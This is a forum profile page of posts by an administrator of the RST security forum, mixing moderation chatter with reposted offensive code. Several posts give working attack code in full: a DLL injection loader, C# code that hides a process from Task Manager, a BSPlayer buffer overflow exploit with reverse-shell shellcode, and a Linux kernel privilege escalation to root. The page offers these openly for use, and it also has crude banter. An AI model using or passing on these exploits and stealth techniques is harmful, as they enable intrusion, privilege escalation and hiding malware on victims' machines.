
Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. It's very important to have a position on RST. You have no idea how well it works: "How are you, doll? This is Nytro, RST administrator!" It's my ace up the sleeve. They drop straight to their knees in front of me when they hear that. :->
  2. I got here too late, but I can still hand out a ban.
  3. RST is hell, the place where everyone becomes worse. But there's nothing wrong with that.
  4. Interesting. Ban.
  5. Yes, interesting: "How to use an exploit". My question is simple: what do I do if a site doesn't have DNN? Or, why would I care to "break into" a site just because it has DNN?
  6. These posts are stored in thin air, not on a computer that of course has one or more IP addresses. You get Internet access by the grace of God, not because your PC is connected to the Internet through a unique (external) IP. Etc. On topic: I'm sure this won't happen. At least not within 10 days. This crisis will probably hit around the middle of the year or even later.
  7. My tentative opinion, out of: virusz, Fitty, Flubber, ZeroCold and Synthesis.
  8. It's not the number of posts that matters but their quality. The number of warnings received also matters.
  9. It can't be found. Only The Jester, who created it, has it. And I hope it never gets made public. If it does, it will probably only work for a few days.
  10. Very cool. Ban.
  11. Yes, ugly. You have to create an account. And it's even uglier because it's in Italian.
  12. I file these useless posts under Offtopic or various other violations of the rules, and such posts earn warnings. And at 3 warnings the ban comes. I think it's much better this way.
  13. Nice, I didn't know that, my Backspace key thanks you
  14. /////////////////////////////////////////////////////////////////
    // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY
    // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    // [2009-10-03] Dll Injection Using SetWindowsHookEx()
    // r00tsecurity -> Source Code Center :: Dll Injection Using SetWindowsHookEx()
    // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    // GENERATED ON: 2011-01-13 | 17:34:45
    /////////////////////////////////////////////////////////////////

    CODE INFO

    The SetWindowsHookEx method

    The SetWindowsHookEx method is a little bit more intrusive than the first, and creates more of a commotion in the injected process, which we normally don't want. However, it is a little bit easier to use than the first, and does have its own advantages (like being able to inject into every process on the system in one shot). The SetWindowsHookEx() function is designed to allow you to "hook" windows messages for a given thread. This requires that you inject a dll into that process's address space, so SetWindowsHookEx() handles all that for us. The dll must have a function for the hook that it created though, otherwise it will crash.

    SOURCE CODE

    #include <windows.h>
    #include <tlhelp32.h>   // CreateToolhelp32Snapshot, Process32First/Next
    #include <shlwapi.h>    // StrStrI

    #define PROC_NAME "target.exe"
    #define DLL_NAME "injected.dll"

    void LoadDll(char *procName, char *dllName);
    unsigned long GetTargetThreadIdFromProcname(char *procName);

    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
        LoadDll(PROC_NAME, DLL_NAME);
        return 0;
    }

    // Load the dll into this process and install a WH_CBT hook on the target
    // thread; Windows then maps the same dll into the thread's process.
    void LoadDll(char *procName, char *dllName)
    {
        HMODULE hDll;
        HOOKPROC cbtProcAddr;

        hDll = LoadLibrary(dllName);
        cbtProcAddr = (HOOKPROC)GetProcAddress(hDll, "CBTProc");
        SetWindowsHookEx(WH_CBT, cbtProcAddr, hDll, GetTargetThreadIdFromProcname(procName));
    }

    // Look the process up by executable name and return a thread id for it.
    unsigned long GetTargetThreadIdFromProcname(char *procName)
    {
        PROCESSENTRY32 pe;
        HANDLE thSnapshot, hProcess;
        BOOL retval, ProcFound = false;
        unsigned long pTID, threadID;

        thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if(thSnapshot == INVALID_HANDLE_VALUE)
        {
            MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", MB_OK);
            return false;
        }

        pe.dwSize = sizeof(PROCESSENTRY32);
        retval = Process32First(thSnapshot, &pe);
        while(retval)
        {
            if(StrStrI(pe.szExeFile, procName))
            {
                ProcFound = true;
                break;
            }
            retval = Process32Next(thSnapshot, &pe);
            pe.dwSize = sizeof(PROCESSENTRY32);
        }
        CloseHandle(thSnapshot);

        // fs:[0x18] is this thread's TEB; offset 0x24 (36) is ClientId.UniqueThread.
        // The same address is then read out of the target process.
        _asm
        {
            mov eax, fs:[0x18]
            add eax, 36
            mov [pTID], eax
        }

        hProcess = OpenProcess(PROCESS_VM_READ, false, pe.th32ProcessID);
        ReadProcessMemory(hProcess, (const void *)pTID, &threadID, 4, NULL);
        CloseHandle(hProcess);

        return threadID;
    }

    // r00tsecurity -> Source Code Center :: Dll Injection Using SetWindowsHookEx()
  15. /////////////////////////////////////////////////////////////////
    // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY
    // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    // [2008-07-15] Hide from Taskmanager
    // r00tsecurity -> Source Code Center :: Hide from Taskmanager
    // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    // GENERATED ON: 2011-01-13 | 17:31:42
    /////////////////////////////////////////////////////////////////

    CODE INFO

    This code is based off a source in vb6 I saw once. I ported it to C# and it works perfectly (after a few adjustments).

    SOURCE CODE

    :::=== WINAPI.CS ===:::

    using System;
    using System.Collections.Generic;
    using System.Text;
    using System.Runtime.InteropServices;

    namespace WinApi
    {
        class User32
        {
            public const Int32 WM_COMMAND = 273;
            public const Int32 MF_ENABLED = 0;
            public const Int32 MF_GRAYED = 1;
            public const Int32 LVM_FIRST = 4096;
            public const Int32 LVM_DELETEITEM = (LVM_FIRST + 8);
            public const Int32 LVM_SORTITEMS = (LVM_FIRST + 48);

            [DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern Int32 FindWindow(string lpClassName, string lpWindowName);

            [DllImport("user32", EntryPoint = "FindWindowExA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern Int32 FindWindowEx(Int32 hWnd1, Int32 hWnd2, string lpsz1, string lpsz2);

            [DllImport("user32", EntryPoint = "EnableWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern bool EnableWindow(Int32 hwnd, Int32 fEnable);

            [DllImport("user32", EntryPoint = "GetMenu", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern Int32 GetMenu(Int32 hwnd);

            [DllImport("user32", EntryPoint = "GetSubMenu", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern Int32 GetSubMenu(Int32 hMenu, Int32 nPos);

            [DllImport("user32", EntryPoint = "GetMenuState", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern Int32 GetMenuState(Int32 hMenu, Int32 wID, Int32 wFlags);

            [DllImport("user32", EntryPoint = "GetMenuItemID", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern Int32 GetMenuItemID(Int32 hMenu, Int32 nPos);

            [DllImport("user32", EntryPoint = "EnableMenuItem", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern Int32 EnableMenuItem(Int32 hMenu, Int32 wIDEnableItem, Int32 wEnable);

            /*[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)]
            public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, StringBuilder lParam);*/

            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)]
            public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, String lParam);
            //Also can add 'ref' or 'out' ahead 'String lParam'
            // -- Do not use 'out String', use '[Out] StringBuilder' instead and initialize the string builder
            // with proper length first. Dunno why but that is the only thing that worked for me.

            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)]
            public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam);

            [DllImport("user32", EntryPoint = "GetDesktopWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern Int32 GetDesktopWindow();

            [DllImport("user32", EntryPoint = "LockWindowUpdate", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
            public static extern Int32 LockWindowUpdate(Int32 hwndLock);
        }
    }

    :::=== FORM1.CS ===:::

    using WinApi;
    using System;
    using System.Diagnostics;      // Process (needed to compile; missing from the original fragment)
    using System.Windows.Forms;    // ListBox (needed to compile; missing from the original fragment)

    System.Timers.Timer taskmanTimer = new System.Timers.Timer(700);
    Int32 proccessIndex = 0;       // position of our own process in the sorted list (used below; the original never declared it)

    #region Hide from taskmanager
    //Begin remove proccess from taskman timer
    private void removeFromTaskManager()
    {
        taskmanTimer.Elapsed += new System.Timers.ElapsedEventHandler(taskmanTimer_Elapsed);
        taskmanTimer.Enabled = true;
    }

    //Timer to remove procces from taskmanager
    void taskmanTimer_Elapsed(object sender, System.Timers.ElapsedEventArgs e)
    {
        Int32 lhWndParent = User32.FindWindow(null, "Windows Task Manager");

        /////Define Handles//////
        Int32 lhWndDialog = 0;
        Int32 lhWndEndTaskButton = 0;
        Int32 lhWndEndProcessButton = 0;
        Int32 lhWndProcessList = 0;
        Int32 lhWndProcessHeader = 0;
        Int32 lhWndTaskList = 0;
        Int32 lhWndTaskHeader = 0;
        Int32 ProcessItemCount = 0;
        Int32 ProcessItemIndex = 0;
        Int32 TaskItemCount = 0;
        Int32 TaskItemIndex = 0;

        /////Get Menues/////
        //Get main menu
        Int32 hMenu = User32.GetMenu(lhWndParent);
        //Get View menu
        Int32 hViewMenu = User32.GetSubMenu(hMenu, 2);
        //Get Update Speed Menu
        Int32 hUpdateSpeed = User32.GetSubMenu(hViewMenu, 1);
        //Get Refresh Now Button
        Int32 hRefreshNow = User32.GetMenuItemID(hViewMenu, 0);
        //Get High
        Int32 hHighRate = User32.GetMenuItemID(hUpdateSpeed, 0);
        //Get Normal
        Int32 hNormalRate = User32.GetMenuItemID(hUpdateSpeed, 1);
        //Get Low
        Int32 hLowRate = User32.GetMenuItemID(hUpdateSpeed, 2);
        //Get Paused
        Int32 hPausedRate = User32.GetMenuItemID(hUpdateSpeed, 3);

        //Walk the task manager's child dialogs and pick up the list views and buttons
        for (int i = 1; i < 7; i++)
        {
            lhWndDialog = User32.FindWindowEx(lhWndParent, lhWndDialog, null, null);
            if (lhWndTaskList == 0) lhWndTaskList = User32.FindWindowEx(lhWndDialog, 0, "SysListView32", "Tasks");
            if (lhWndTaskHeader == 0) lhWndTaskHeader = User32.FindWindowEx(lhWndTaskList, 0, "SysHeader32", null);
            if (lhWndEndTaskButton == 0) lhWndEndTaskButton = User32.FindWindowEx(lhWndDialog, lhWndTaskList, "Button", "&End Task");
            if (lhWndProcessList == 0) lhWndProcessList = User32.FindWindowEx(lhWndDialog, 0, "SysListView32", "Processes");
            if (lhWndProcessHeader == 0) lhWndProcessHeader = User32.FindWindowEx(lhWndProcessList, 0, "SysHeader32", null);
            if (lhWndEndProcessButton == 0) lhWndEndProcessButton = User32.FindWindowEx(lhWndDialog, lhWndProcessList, "Button", "&End Process");
        }

        //Pause the update speed
        User32.SendMessage((IntPtr)lhWndParent, User32.WM_COMMAND, (IntPtr)hPausedRate, IntPtr.Zero);
        //User32.SendMessage((IntPtr)lhWndParent,(uint)User32.WM_COMMAND,(IntPtr)hPausedRate,

        /////Disable Menu Items//////
        User32.EnableMenuItem(hMenu, hRefreshNow, User32.MF_GRAYED);
        User32.EnableMenuItem(hMenu, hLowRate, User32.MF_GRAYED);
        User32.EnableMenuItem(hMenu, hNormalRate, User32.MF_GRAYED);
        User32.EnableMenuItem(hMenu, hHighRate, User32.MF_GRAYED);
        User32.EnableMenuItem(hHighRate, hPausedRate, User32.MF_GRAYED);
        User32.EnableWindow(lhWndProcessHeader, 0);
        User32.EnableWindow(lhWndTaskHeader, 0);

        //Build a sorted copy of the process names, the same order the list view shows
        Process[] Processes;
        Int32 z;
        string item;
        ListBox list = new ListBox();
        list.Sorted = true;
        Processes = Process.GetProcesses();
        foreach (Process p in Processes)
        {
            if (p.ProcessName.ToString() == "Idle")
                list.Items.Add("System Idle Process");
            else
                list.Items.Add(p.ProcessName.ToString());
        }
        ProcessItemCount = Processes.Length;
        ProcessItemCount--;

        string HideMe = Process.GetCurrentProcess().ProcessName;
        for (int x = 0; x != ProcessItemCount; x++)
        {
            item = list.Items[x].ToString();
            if (item == HideMe)
                proccessIndex = x;
        }

        User32.LockWindowUpdate(lhWndProcessList);
        //refresh
        User32.SendMessage((IntPtr)lhWndParent, User32.WM_COMMAND, (IntPtr)hRefreshNow, IntPtr.Zero);
        //sort items
        User32.SendMessage((IntPtr)lhWndProcessList, User32.LVM_SORTITEMS, IntPtr.Zero, null);
        //Delete ourselves from the list >=D
        User32.SendMessage((IntPtr)lhWndProcessList, User32.LVM_DELETEITEM, (IntPtr)proccessIndex, IntPtr.Zero);
        User32.LockWindowUpdate(0);

        if (lhWndParent == 0)
            //taskmanager is closed refrsh every 800 miliseconds
            taskmanTimer.Interval = 800;
        else
            //taskmanager is open and paused. we don't have to refresh as fast
            taskmanTimer.Interval = 2500;
    }
    #endregion

    // Start the timer from the form's constructor:
    // removeFromTaskManager();

    // r00tsecurity -> Source Code Center :: Hide from Taskmanager
  16. I saw these a few days ago too, but I'm used to this kind of "people who know about computers", I used to see a lot of them on Hellshit. At least here, in our daily Offtopic, nobody shows off their incredible knowledge in various fields.
  17. It won't be closed. If you don't like the section, don't visit it. Many interesting things show up there; of course, often they have nothing to do with IT, but they're still interesting. It can't be only technical discussions, and it isn't really, at least we get to talk about something over there. That's not how we'll get rid of the stupid and useless posts.
  18. That kind of tutorial is for "hacking in everyday life", if we can call it that, and I see nothing wrong with them. Don't worry, there are plenty of tutorials you can read.
  19. Nytro

    Exam session

    Good luck to everyone starting the exam session. Is anyone at Computer Science at the University of Bucharest? Starting tomorrow I'm going to study. So I think I'll be around here less often, behave yourselves.
  20. Yes, I think it's necessary. I woke up in the morning, saw it done and went back to sleep. When I woke up I had the impression I had dreamed RST, that there were new categories...
  21. Without a bit of discipline nobody gets anywhere. The problem is that nobody reads the rules, and in general nobody reads the topics in "Announcements" where various clarifications are made. I don't delete topics, except very rarely, but I move them, most of the time to Help or Requests, where they belong. Why the hell do you post anything here, when that anything has a special category dedicated to it? E.g. http://rstcenter.com/forum/30130-help-download-podcast.rst It had been posted in Offtopic when it should have been posted in Help. If everyone posted whatever crossed their mind here, what would come of it? But no, I have to hand out warnings and keep moving topics for you...
  22. State of the Art Post Exploitation in Hardened PHP Environments
    Author: Stefan Esser

    Abstract

    In this paper we discuss the different protections an attacker faces in hardened PHP environments, after he succeeded in executing arbitrary PHP code. We introduce new techniques to overcome most of them by the use of local PHP exploits. We demonstrate how info leak and memory corruption vulnerabilities can be combined to enable PHP applications to read and write arbitrary memory. We will show step by step how important memory structures can be leaked and manipulated in order to deactivate or overcome protections.

    Download: http://www.exploit-db.com/download_pdf/15955

    More technical than the "classic" articles.
  23. Advanced MySQL Exploitation
    Author: Muhaimin Dzulfakar

    Contents
    1 Abstract ........ 3
    2 Introduction ........ 3
    3 Stacked Query ........ 3
    4 Attacking MySQL on applications that do support stacked queries ........ 4
    5 Attacking MySQL on applications that do not support stacked queries ........ 5
    6 Fingerprinting the web server directory ........ 7
    6.1 Fingerprint through error message method ........ 7
    6.2 Fingerprint through LOAD_FILE method ........ 7
    7 Maximum size of arbitrary code allowed ........ 7
    8 Arbitrary file compression/decompression ........ 8
    9 Dealing with columns ........ 8
    10 Remote code execution on LAMP ........ 9
    11 Remote code execution on WAMP ........ 10
    References ........ 11

    Download: http://www.exploit-db.com/download_pdf/15956

    See the references.
  24. Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH)

    I don't know if it works, but if it does, nice things can be done with it.

    #
    #
    #[+]Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH)
    #[+]Date: 01\07\2010
    #[+]Author: C4SS!0 G0M3S
    #[+]Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2
    #[+]Version: 2.57
    #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
    #[+]CVE: N/A
    #
    #
    # ######### ## ######### ######### ## ###############
    # ######### #### ######### ######### ## ## ##
    # ## ## ## ## ## ## ## ##
    # ## ## ## ## ## ## ## ##
    # ## ########## ######## ######## ## ## ##
    # ## ## ## ## ## ## ##
    # ## ## ## ## ## ## ##
    # ######## ## ######## ######### ## ## ##
    # ######## ## ######## ######### \/ ###############
    #
    #Created By C4SS!0 G0M3S
    #Louredo_@hotmail.com
    #www.invasao.com.br
    #
    #

    import os
    import sys
    import time
    import string

    os.system("cls")
    os.system("color 4f")

    def usage():
        print "\n"
        print "[+]Exploit: Exploit Buffer Overflow Bsplayer(UNICODE-SEH)"
        print "[+]Date: 01\\07\\2010"
        print "[+]Author: C4SS!0 G0M3S"
        print "[+]Home: www.invasao.com.br"
        print "[+]E-mail: Louredo_@hotmail.com"
        print "[+]Version: 2.57"
        print "[+]Software: Bsplayer 2.57\n"
        print "[-]Note:"
        print "TO EXPLOIT THE RUN FILE NAME MUST BE FILE_NAME.M3U\n"

    if((len(sys.argv)!=3) or (int(sys.argv[1])<1) or (int(sys.argv[1])>2)):
        usage()
        print "Payloads:\n1 - WinExec(\"Calc.exe\",0)\n2 - Reverse_Tcp_Shell\n"
        print "[-]Usage: "+sys.argv[0]+" <Playload Number> <File Name>"
        print "[-]Exemple: "+sys.argv[0]+" 1 Exploit.m3u"
        sys.exit(0)

    usage()

    buffer = "\x42" * 4102
    nseh = "\x61\x6d"
    seh = "\xde\x4e" #pop ebx - pop ebp - ret at 0x004E00DE [bsplayer.exe]
    egg_hunter = "\x45\x61\x45\x61\x45\x50\x45\xc3"
    junk = "\x45" * 1094

    print "[*]Identifying the length Shellcode"
    time.sleep(1)

    if int(sys.argv[1]) == 2:
        shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
        "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBNKWY7N4PV9X6PQX1PV9JYNZ9SDMTZTR"   #
        "83SY0KT01RPLLLCBPLLT2RLPJX9KKTOX3NZUKKV0VLK3Y3MLRONMMJU2VWC8VQKQSOPTZT3CTK1LPUR6"   #
        "KZR65RJC7NPWDLVRZQUMFMV85BXR7BOG8SCKUNXUVMVGIPMKJJZ6XSQ40ORI2UTOWNWRXVF679XJWYPL"   #FROM METASPLOIT FRAMEWORK
        "OU2QOXQNN0GGLNM3HJLRVWUSKO4OWMVOZKXLKLY2B3U1BQMPEBVMQEEFULKP12N8GHWH43CROTS2NPPD"   #
        "QT0YXLS5MOM3OCKSRWPFLJWWN19PSXXOFKYD7KLN3WYMFFEJY7LO785W6C1TM7MOURUH7EOM1FZTEMOJ"   #SHELLCODE REVERSE_TCP_SHELL ON PORT 4444
        "28TUN2LK0SKNTKKPHJSDRKLFONNC2620QXQTRFZUE3UGR8TOL5V3YO47PRSMMBURNNL9MNEHNELX5NOW"   #
        "Q8C5UPOLK3BIRSQBOXVDD9STOI8LHBM1Y3PEPOKMQOMKRN8JZIJ3MPJ0VRRYY92VP0DLVJ3TVJFWKSKB"   #PROMPT:
        "QCMXW7O30CRZRF7JK7JV4S2SRM9M5RRTOZZVFYQQDKKW1LY7S6LZFJLLZNXMJB685QOJGLNKNITOCZSK"   #
        "QITVVPONFL6LN0O1RVBINM6OLML4XL0TNL6RRVN28UOKSULQJXYLLY9NLM57LVDS8NY2PMQ3MORRMHQD"   #C:\>Telnet 127.0.0.1 4444
        "BEINV9QY8U0MN1ZTUPPO3KGMVDOQWLNEUOJLWKE6UPNMBX12QURRNVJN78DYMXKOMHNA")
    #
    #
    if int(sys.argv[1]) == 1:
        shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
        "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBIKY0NQ99GO3LLVRPHLXY2TMTL46QMNR"
        "8P1SHN853YXKLKSSHQXL4TENPSHWL3599RX6VNCJUKCH4VNSMM25ZOJP2MLWORBZMMM1DJ5QVO9MQ9W4"
        "V30ZUBQWZLFP5KELTXGCLKKMKLE2KZPNG9MOXKMNBNXMKVBK893KGOKSJXOPLPOMS8SR3UTPWKGHXOKT"
        "CDN4CMOQG1C34R171NSXML5WVKE7QSN4XL5VJZQM5W8O669OMOK90J9KN0Q31VVLNNOCUN957X7SHNOP"
        "YTP3KXWLE3O9XCKXJA")

    print "[*]The Length Shellcode:"+str(len(shellcode))
    time.sleep(1)
    shellcode += "\x41" * 5000

    file = str(sys.argv[2])
    payload = buffer+nseh+seh+egg_hunter+junk+shellcode
    op = "w"

    print "[*]Creating Your File "+file
    time.sleep(1)
    try:
        f = open(file,op)
        f.write("http://"+payload)
        f.close()
        print "[*]The File "+file+" was Successfully Created"
    except:
        print "[*]Error Creating File "+file

    Source: BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)
  25. Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)

    I haven't looked over it, I'll see what it's about when I have some free time.

    /*
     * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)
     * by Joe Sylve
     * @jtsylve on twitter
     *
     * Released: Jan 7, 2011
     *
     * Based on the bug found by Dan Rosenberg (@djrbliss)
     * only loosely based on his exploit http://www.exploit-db.com/exploits/15916/
     *
     * Usage:
     * gcc -w caps-to-root2.c -o caps-to-root2
     * sudo setcap cap_sys_admin+ep caps-to-root2
     * ./caps-to-root2
     *
     * Kernel Version >= 2.6.34 (untested on earlier versions)
     *
     * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit
     *
     * This exploit takes advantage of the same underflow as the original,
     * but takes a different approach. Instead of underflowing into userspace
     * (which doesn't work on 64-bit systems and is a lot of work), I underflow
     * to some static values inside of the kernel which are referenced as pointers
     * to userspace. This method is pretty simple and seems to be reliable.
     */

    #include <stdio.h>
    #include <sys/socket.h>
    #include <sys/ioctl.h>   // ioctl() (needed for a clean build)
    #include <errno.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <unistd.h>

    // Skeleton Structures of the Kernel Structures we're going to spoof
    struct proto_ops_skel {
        int family;
        void *buffer1[8];
        int (*ioctl)(void *, int, long);
        void *buffer2[12];
    };

    struct phonet_protocol_skel {
        void *ops;
        void *prot;
        int sock_type;
    };

    #ifdef __x86_64__
    #define SYM_NAME "local_port_range"
    #define SYM_ADDRESS 0x0000007f00000040
    #define SYM_OFFSET 0x0
    typedef int (* _commit_creds)(unsigned long cred);
    typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred);
    #else //32-bit
    #define SYM_NAME "pn_proto"
    #define SYM_ADDRESS 0x4e4f4850
    #define SYM_OFFSET 0x90
    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    #endif

    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;

    // Installed as the fake ioctl handler; runs in kernel context
    int getroot(void * v, int i, long l)
    {
        commit_creds(prepare_kernel_cred(0));
        return 0;
    }

    /* thanks spender... */
    // Resolve a symbol address by parsing /proc/kallsyms
    unsigned long get_kernel_sym(char *name)
    {
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[512];
        int ret = 0;   // initialised so the first loop test is defined
        char command[512];

        sprintf(command, "grep \"%s\" /proc/kallsyms", name);
        f = popen(command, "r");

        while(ret != EOF) {
            ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
            if (ret == 0) {
                fscanf(f, "%s\n", sname);
                continue;
            }
            if (!strcmp(name, sname)) {
                fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
                pclose(f);
                return addr;
            }
        }
        pclose(f);
        return 0;
    }

    int main(int argc, char * argv[])
    {
        int sock, proto;
        unsigned long proto_tab, low_kern_sym, pn_proto;
        void * map;

        /* Create a socket to load the module for symbol support */
        printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n");
        sock = socket(PF_PHONET, SOCK_DGRAM, 0);
        if(sock < 0) {
            if(errno == EPERM)
                printf("[*] You don't have CAP_SYS_ADMIN.\n");
            else
                printf("[*] Failed to open Phonet socket.\n");
            return -1;
        }
        close(sock);

        /* Resolve kernel symbols */
        printf("[*] Resolving kernel symbols...\n");
        proto_tab = get_kernel_sym("proto_tab");
        low_kern_sym = get_kernel_sym(SYM_NAME) + SYM_OFFSET;
        pn_proto = get_kernel_sym("pn_proto");
        commit_creds = (void *) get_kernel_sym("commit_creds");
        prepare_kernel_cred = (void *) get_kernel_sym("prepare_kernel_cred");

        if(!proto_tab || !commit_creds || !prepare_kernel_cred) {
            printf("[*] Failed to resolve kernel symbols.\n");
            return -1;
        }

        if (low_kern_sym >= proto_tab) {
            printf("[*] %s is mapped higher than prototab. Can not underflow .\n", SYM_NAME);
            return -1;
        }

        /* Map it */
        printf("[*] Preparing fake structures...\n");
        const struct proto_ops_skel fake_proto_ops2 = {
            .family = AF_PHONET,
            .ioctl = &getroot,
        };

        struct phonet_protocol_skel pps = {
            .ops = (void *) &fake_proto_ops2,
            .prot = (void *) pn_proto,
            .sock_type = SOCK_DGRAM,
        };

        printf("[*] Copying Structures.\n");
        map = mmap((void *) SYM_ADDRESS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if(map == MAP_FAILED) {
            printf("[*] Failed to map landing area.\n");
            perror("mmap");
            return -1;
        }
        memcpy((void *) SYM_ADDRESS, &pps, sizeof(pps));

        // Calculate Underflow
        proto = -((proto_tab - low_kern_sym) / sizeof(void *));
        printf("[*] Underflowing with offset %d\n", proto);
        sock = socket(PF_PHONET, SOCK_DGRAM, proto);
        if(sock < 0) {
            printf("[*] Underflow failed .\n");
            return -1;
        }

        printf("[*] Elevating privlidges...\n");
        ioctl(sock, 0, NULL);

        if(getuid()) {
            printf("[*] Exploit failed to get root.\n");
            return -1;
        }

        printf("[*] This was a triumph... I'm making a note here, huge success.\n");
        execl("/bin/sh", "/bin/sh", NULL);

        close(sock);
        munmap(map, 0x1000);
        return 0;
    }

    Source: Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)